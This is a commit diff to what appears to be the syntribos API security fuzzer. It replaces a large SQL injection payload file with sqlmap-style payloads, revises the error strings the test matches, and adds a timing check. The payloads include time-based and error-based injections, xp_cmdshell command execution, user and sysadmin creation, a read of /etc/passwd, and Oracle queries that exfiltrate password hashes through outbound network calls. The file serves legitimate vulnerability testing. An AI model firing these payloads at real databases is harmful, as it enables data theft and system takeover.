Improved SQL tests

SQL injection payloads and error strings are now similar to that of SQLmap Change-Id: I13c041ed25be7c130e20306e828c7bd149df4da2 Implements: blueprint/test-fuzz-sql-improve
2016-05-16 14:27:02 -05:00 · 2016-05-16 14:27:02 -05:00 · 5b00943aec
commit 5b00943aec
parent 86a5fabbb2
2 changed files with 59 additions and 346 deletions
--- a/data/sql-injection.txt
+++ b/data/sql-injection.txt
@ -1,327 +1,30 @@
-'; if not(substring((select @@version),25,1) <> 0) waitfor delay '0:0:2' --
-'; if not(substring((select @@version),25,1) <> 5) waitfor delay '0:0:2' --
-'; if not(substring((select @@version),25,1) <> 8) waitfor delay '0:0:2' --
-'; if not(substring((select @@version),24,1) <> 1) waitfor delay '0:0:2' --
-'; if not(select system_user) <> 'sa' waitfor delay '0:0:2' --
-'; if is_srvrolemember('sysadmin') > 0 waitfor delay '0:0:2' --
-'; if not((select serverproperty('isintegratedsecurityonly')) <> 1) waitfor delay '0:0:2' --
-'; if not((select serverproperty('isintegratedsecurityonly')) <> 0) waitfor delay '0:0:2' --
-'; exec master..xp_cmdshell 'ping 10.10.1.2'--
-'create user name identified by 'pass123' --
-'create user name identified by pass123 temporary tablespace temp default tablespace users;
-' ; drop table temp --
-'exec sp_addlogin 'name' , 'password' --
-' exec sp_addsrvrolemember 'name' , 'sysadmin' --
-' insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123')) --
-' grant connect to name; grant resource to name; --
-' insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)
+AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT('x',(SELECT (ELT(1=1,1))),'x',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
+AND EXTRACTVALUE(1,CONCAT('','x',(SELECT (ELT(1=1,1))),'x'))
+AND UPDATEXML(1,CONCAT('.','x',(SELECT (ELT(1=1,1))),'x'),2)
+AND ROW(1,2)>(SELECT COUNT(*),CONCAT('x',(SELECT (ELT(1=1,1))),'x',FLOOR(RAND(0)*2))x FROM (SELECT 3 UNION SELECT 4 UNION SELECT 5 UNION SELECT 6)a GROUP BY x)
+AND 1=CAST('x'||(SELECT (CASE WHEN (1=1) THEN 1 ELSE 0 END))::text||'x' AS NUMERIC)
+PROCEDURE ANALYSE(EXTRACTVALUE(1,CONCAT('','x',(SELECT (CASE WHEN (1=1) THEN 1 ELSE 0 END)),'x')),1)
+(SELECT 1 FROM(SELECT COUNT(*),CONCAT('x',(SELECT (ELT(1=1,1))),'x',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
+(EXTRACTVALUE(1,CONCAT('','x',(SELECT (ELT(1=1,1))),'x')))
+(CAST('x'||(SELECT (CASE WHEN (1=1) THEN 1 ELSE 0 END))::text||'x' AS NUMERIC))
+,(SELECT 1 FROM(SELECT COUNT(*),CONCAT('x',(SELECT (ELT(1=1,1))),'x',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
+,ROW(1,2)>(SELECT COUNT(*),CONCAT('x',(SELECT (ELT(1=1,1))),'x',FLOOR(RAND(0)*2))x FROM (SELECT 3 UNION SELECT 4 UNION SELECT 5 UNION SELECT 6)a GROUP BY x)
+,(CAST('x'||(SELECT (CASE WHEN (1=1) THEN 1 ELSE 0 END))::text||'x' AS NUMERIC))
+AND (SELECT * FROM (SELECT(SLEEP(10)))x)
+AND SLEEP(10)
+RLIKE (SELECT * FROM (SELECT(SLEEP(10)))x)
+AND ELT(1=1,SLEEP(10))
+AND 1=(SELECT 1 FROM PG_SLEEP(10))
+(SELECT (CASE WHEN (1=1) THEN SLEEP(10) ELSE 1*(SELECT 1 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
+(SELECT * FROM (SELECT(SLEEP(10)))x)
+(SELECT 1 FROM PG_SLEEP(10))
+,(SELECT (CASE WHEN (1=1) THEN SLEEP(10) ELSE 1*(SELECT 1 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
+,(SELECT (CASE WHEN (1=1) THEN (SELECT 1 FROM PG_SLEEP(10)) ELSE 1/(SELECT 0) END))
+a'b"c'd"
+' or 'a'='a
+" or "a"="a
+') or ('a'='a
+'/**/OR/**/1/**/=/**/1
 ' or 1=1 --
 ' union (select @@version) --
-' union (select NULL, (select @@version)) --
-' union (select NULL, NULL, (select @@version)) --
-' union (select NULL, NULL, NULL,  (select @@version)) --
-' union (select NULL, NULL, NULL, NULL,  (select @@version)) --
-' union (select NULL, NULL, NULL, NULL,  NULL, (select @@version)) --
-<>"'%;)(&+
-|
-!
-?
-/
-//
-//*
-'
-' --
-(
-)
-*|
-*/*
-&
-0
-031003000270000
-0 or 1=1
-0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
-0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A
-0x77616974666F722064656C61792027303A303A31302700 exec(@s)
-1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;
-1 or 1=1
-1;SELECT%20*
-1 waitfor delay '0:0:10'--
-'%20or%20''='
-'%20or%201=1
-')%20or%20('x'='x
-'%20or%20'x'='x
-%20or%20x=x
-%20'sleep%2050'
-%20$(sleep%2050)
-%21
-23 OR 1=1
-%26
-%27%20or%201=1
-%28
-%29
-%2A%28%7C%28mail%3D%2A%29%29
-%2A%28%7C%28objectclass%3D%2A%29%29
-%2A%7C
-||6
-'||'6
-(||6)
-%7C
-a'
-admin' or '
-' and 1=( if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0));
-' and 1 in (select var from temp)--
-anything' OR 'x'='x
-"a"" or 1=1--"
-a' or 1=1--
-"a"" or 3=3--"
-a' or 3=3--
-a' or 'a' = 'a
-&apos;%20OR
-as
-asc
-a' waitfor delay '0:0:10'--
-'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login >
-bfilename
-char%4039%41%2b%40SELECT
-declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
-declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q)
-declare @q nvarchar (4000) select @q =
-declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s)
-declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s)
-declare @s varchar(22) select @s =
-declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e
-delete
-desc
-distinct
-'||(elt(-3+5,bin(15),ord(10),hex(char(45))))
-'; exec master..xp_cmdshell
-'; exec master..xp_cmdshell 'ping 172.10.1.255'--
-exec(@s)
-'; exec ('sel' + 'ect us' + 'er')
-exec sp
-'; execute immediate 'sel' || 'ect us' || 'er'
-exec xp
-'; exec xp_regread
-' group by userid having 1=1--
-handler
-having
-' having 1=1--
-hi or 1=1 --"
-hi' or 1=1 --
-"hi"") or (""a""=""a"
-hi or a=a
-hi' or 'a'='a
-hi') or ('a'='a
-'hi' or 'x'='x';
-insert
-like
-limit
-*(|(mail=*))
-*(|(objectclass=*))
-or
-' or ''='
- or 0=0 #"
-' or 0=0 --
-' or 0=0 #
-" or 0=0 --
-or 0=0 --
-or 0=0 #
-' or 1 --'
-' or 1/*
-; or '1'='1'
-' or '1'='1
-' or '1'='1'--
-' or 1=1
-' or 1=1 /*
-' or 1=1--
-' or 1=1--
-'/**/or/**/1/**/=/**/1
-‘ or 1=1 --
-" or 1=1--
-or 1=1
-or 1=1--
- or 1=1 or ""=
-' or 1=1 or ''='
-' or 1 in (select @@version)--
-or%201=1
-or%201=1 --
-' or 2 > 1
-' or 2 between 1 and 3
-' or 3=3
-‘ or 3=3 --
-' or '7659'='7659
- or a=a
- or a = a
-' or 'a'='a
-' or a=a--
-') or ('a'='a
-" or "a"="a
-) or (a=a
-order by
-' or (EXISTS)
- or isNULL(1/0) /*
-" or isNULL(1/0) /*
-' or 'something' like 'some%'
-' or 'something' = 'some'+'thing'
-' or 'text' = n'text'
-' or 'text' > 't'
-' or uid like '%
-' or uname like '%
-' or 'unusual' = 'unusual'
-' or userid like '%
-' or user like '%
-' or username like '%
-' or username like char(37);
-' or 'whatever' in ('whatever')
-' -- &password=
-password:*/=1--
-PRINT
-PRINT @@variable
-procedure
-replace
-select
-' select * from information_schema.tables--
-' select name from syscolumns where id = (select id from sysobjects where name = tablename')--
-' (select top 1
--sp_password
-'sqlattempt1
-(sqlattempt2)
-'sqlvuln
-'+sqlvuln
-(sqlvuln)
-sqlvuln;
-t'exec master..xp_cmdshell 'nslookup www.google.com'--
-to_timestamp_tz
-truncate
-tz_offset
-' UNION ALL SELECT
-' union all select @@version--
-' union select
-uni/**/on sel/**/ect
-' UNION SELECT
-' union select 1,load_file('/etc/passwd'),1,1,1;
-) union select * from information_schema.tables;
-' union select * from users where login = char(114,111,111,116);
-update
-'||UTL_HTTP.REQUEST
-,@variable
-@variable
-@var select @var as var into temp end --
-\x27UNION SELECT
-x' AND 1=(SELECT COUNT(*) FROM tabname); --
-x' AND email IS NULL; --
-x' AND members.email IS NULL; --
-x' AND userid IS NULL; --
-x' or 1=1 or 'x'='y
-x' OR full_name LIKE '%Bob%
-ý or 1=1 --
-sleep(__TIME__)#
-1 or sleep(__TIME__)#
-" or sleep(__TIME__)#
-' or sleep(__TIME__)#
-" or sleep(__TIME__)="
-' or sleep(__TIME__)='
-1) or sleep(__TIME__)#
-") or sleep(__TIME__)="
-') or sleep(__TIME__)='
-1)) or sleep(__TIME__)#
-")) or sleep(__TIME__)="
-')) or sleep(__TIME__)='
-;waitfor delay '0:0:__TIME__'--
-);waitfor delay '0:0:__TIME__'--
-';waitfor delay '0:0:__TIME__'--
-";waitfor delay '0:0:__TIME__'--
-');waitfor delay '0:0:__TIME__'--
-");waitfor delay '0:0:__TIME__'--
-));waitfor delay '0:0:__TIME__'--
-'));waitfor delay '0:0:__TIME__'--
-"));waitfor delay '0:0:__TIME__'--
-benchmark(10000000,MD5(1))#
-1 or benchmark(10000000,MD5(1))#
-" or benchmark(10000000,MD5(1))#
-' or benchmark(10000000,MD5(1))#
-1) or benchmark(10000000,MD5(1))#
-") or benchmark(10000000,MD5(1))#
-') or benchmark(10000000,MD5(1))#
-1)) or benchmark(10000000,MD5(1))#
-")) or benchmark(10000000,MD5(1))#
-')) or benchmark(10000000,MD5(1))#
-pg_sleep(__TIME__)--
-1 or pg_sleep(__TIME__)--
-" or pg_sleep(__TIME__)--
-' or pg_sleep(__TIME__)--
-1) or pg_sleep(__TIME__)--
-") or pg_sleep(__TIME__)--
-') or pg_sleep(__TIME__)--
-1)) or pg_sleep(__TIME__)--
-")) or pg_sleep(__TIME__)--
-')) or pg_sleep(__TIME__)--
-1'1
-1 exec sp_ (or exec xp_)
-1 and 1=1
-1' and 1=(select count(*) from tablenames); --
-1 or 1=1
-1' or '1'='1
-1
-1 and user_name() = 'dbo'
-\'; desc users; --
-1\'1
-1' and non_existant_table = '1
-' or username is not NULL or username = '
-1 and ascii(lower(substring((select top 1 name from sysobjects where xtype='u'), 1, 1))) > 116
-1 union all select 1,2,3,4,5,6,name from sysobjects where xtype = 'u' --
-1 uni/**/on select all from where
-’ or ‘1’=’1
-' or '1'='1
-'||utl_http.request('httP://192.168.1.1/')||'
-' || myappadmin.adduser('admin', 'newpass') || '
-' AND 1=utl_inaddr.get_host_address((SELECT banner FROM v$version WHERE ROWNUM=1)) AND 'i'='i
-' AND 1=utl_inaddr.get_host_address((SELECT SYS.LOGIN_USER FROM DUAL)) AND 'i'='i
-' AND 1=utl_inaddr.get_host_address((SELECT SYS.DATABASE_NAME FROM DUAL)) AND 'i'='i
-' AND 1=utl_inaddr.get_host_address((SELECT host_name FROM v$instance)) AND 'i'='i
-' AND 1=utl_inaddr.get_host_address((SELECT global_name FROM global_name)) AND 'i'='i
-' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(USERNAME)) FROM SYS.ALL_USERS)) AND 'i'='i
-' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(PASSWORD)) FROM SYS.USER$)) AND 'i'='i
-' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(table_name)) FROM sys.all_tables)) AND 'i'='i
-' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(column_name)) FROM sys.all_tab_columns)) AND 'i'='i
-' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(GRANTED_ROLE)) FROM DBA_ROLE_PRIVS WHERE GRANTEE=SYS.LOGIN_USER)) AND 'i'='i
-' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=1)) AND 'i'='i
-' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=1)) AND 'i'='i
-' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=1)) AND 'i'='i
-' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=1)) AND 'i'='i
-' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=1)) AND 'i'='i
-' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=2)) AND 'i'='i
-' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=2)) AND 'i'='i
-' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=2)) AND 'i'='i
-' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=2)) AND 'i'='i
-' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=2)) AND 'i'='i
-' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=3)) AND 'i'='i
-' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=3)) AND 'i'='i
-' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=3)) AND 'i'='i
-' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=3)) AND 'i'='i
-' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=3)) AND 'i'='i
-' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=4)) AND 'i'='i
-' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=4)) AND 'i'='i
-' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=4)) AND 'i'='i
-' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=4)) AND 'i'='i
-' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=4)) AND 'i'='i
-' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=5)) AND 'i'='i
-' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=5)) AND 'i'='i
-' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=5)) AND 'i'='i
-' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=5)) AND 'i'='i
-' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=5)) AND 'i'='i
-' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=6)) AND 'i'='i
-' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=6)) AND 'i'='i
-' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=6)) AND 'i'='i
-' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=6)) AND 'i'='i
-' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=6)) AND 'i'='i
-' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=7)) AND 'i'='i
-' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=7)) AND 'i'='i
-' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=7)) AND 'i'='i
-' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=7)) AND 'i'='i
-' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=7)) AND 'i'='i
-' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=8)) AND 'i'='i
-' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=8)) AND 'i'='i
-' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=8)) AND 'i'='i
-' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=8)) AND 'i'='i
-' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=8)) AND 'i'='i
+; OR '1'='1'
--- a/syntribos/tests/fuzz/sql.py
+++ b/syntribos/tests/fuzz/sql.py
@ -20,27 +20,23 @@ class SQLInjectionBody(base_fuzz.BaseFuzzTestCase):
    test_type = "data"
    data_key = "sql-injection.txt"
    failure_keys = [
-        'fatal',
-        'warning',
-        'error',
-        'exception',
-        'illegal',
-        'invalid',
-        'fail',
-        'stack',
-        'access',
-        'directory',
-        'file',
-        'not found',
-        'unknown',
-        'uid=',
-        'varchar',
-        'ODBC',
-        'SQL',
-        'quotation mark',
-        'syntax',
-        'ORA-',
-        '111111'
+        "SQL syntax",
+        "mysql",
+        "MySqlException (0x",
+        "valid MySQL result",
+        "check the manual that corresponds to your MySQL server version",
+        "MySqlClient.",
+        "com.mysql.jdbc.exceptions",
+        "SQLite/JDBCDriver",
+        "SQLite.Exception",
+        "System.Data.SQLite.SQLiteException",
+        "sqlite_.",
+        "SQLite3::",
+        "[SQLITE_ERROR]",
+        "Unknown column",
+        "where clause",
+        "SqlServer",
+        "syntax error"
    ]

    def test_case(self):
@ -60,6 +56,20 @@ class SQLInjectionBody(base_fuzz.BaseFuzzTestCase):
                      )
            )

+        time_diff = self.config.time_difference_percent / 100
+        if (self.resp.elapsed.total_seconds() >
+                time_diff * self.init_response.elapsed.total_seconds()):
+            self.register_issue(
+                Issue(test="sql_timing",
+                      severity="Medium",
+                      confidence="Medium",
+                      text=(
+                          "A response to one of our payload requests has "
+                          "taken too long compared to the baseline request. "
+                          "This could indicate a vulnerability to time-based "
+                          "SQL injection attacks"))
+            )
+

 class SQLInjectionParams(SQLInjectionBody):
    test_name = "SQL_INJECTION_PARAMS"